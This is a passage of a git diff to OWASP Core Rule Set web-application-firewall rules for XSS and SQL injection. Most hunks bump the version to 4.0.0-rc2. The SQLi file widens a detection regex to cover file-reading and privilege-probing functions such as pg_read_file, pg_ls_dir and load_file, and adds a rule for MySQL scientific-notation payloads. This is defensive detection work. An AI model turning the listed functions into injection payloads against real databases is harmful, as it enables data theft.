     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -315,7 +315,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -334,7 +334,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -353,7 +353,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -372,7 +372,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -391,7 +391,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?:\xbc\s*/\s*[^\xbe>]*[\xbe>])|(?:<\s*/\s*[^\xbe]*\xbe)" \
@@ -413,7 +413,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -431,7 +431,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242/63',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -449,7 +449,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|REQU
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242/63',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -467,7 +467,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -485,7 +485,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -506,7 +506,7 @@ SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -525,7 +525,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -544,7 +544,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -563,7 +563,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -583,7 +583,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/242/63',\
     tag:'PCI/6.5.1',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -603,7 +603,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/242',\
     tag:'PCI/6.5.1',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -623,7 +623,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/242',\
     tag:'PCI/6.5.1',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -641,7 +641,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242/63',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
index 4899d0f..8e394b9 100644
--- a/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+++ b/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -46,11 +46,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|iel(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|time(?:stamp)?|user)))|d(?:a(?:t(?:abase|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t_(?:format|lock))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull))|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|inser_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|sleep)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[1-2]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\(" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|iel(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|inser_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[1-2]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\(" \
     "id:942151,\
     phase:2,\
     block,\
@@ -66,7 +66,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -85,7 +85,7 @@ SecRule REQUEST_BASENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -105,7 +105,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -125,7 +125,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -145,7 +145,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -165,7 +165,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -185,7 +185,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -205,7 +205,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -225,7 +225,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -245,7 +245,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -265,7 +265,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -285,7 +285,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -305,7 +305,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -325,7 +325,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -345,7 +345,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -365,7 +365,26 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
+    severity:'CRITICAL',\
+    setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
+    setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)1\.e[\(-\),]" \
+    "id:942560,\
+    phase:2,\
+    block,\
+    t:none,t:urlDecodeUni,t:replaceComments,\
+    msg:'MySQL Scientific Notation payload detected',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-multi',\
+    tag:'platform-multi',\
+    tag:'attack-sqli',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/248/66',\
+    tag:'PCI/6.5.2',\
+    tag:'paranoia-level/1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -384,7 +403,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -406,7 +425,7 @@ SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\
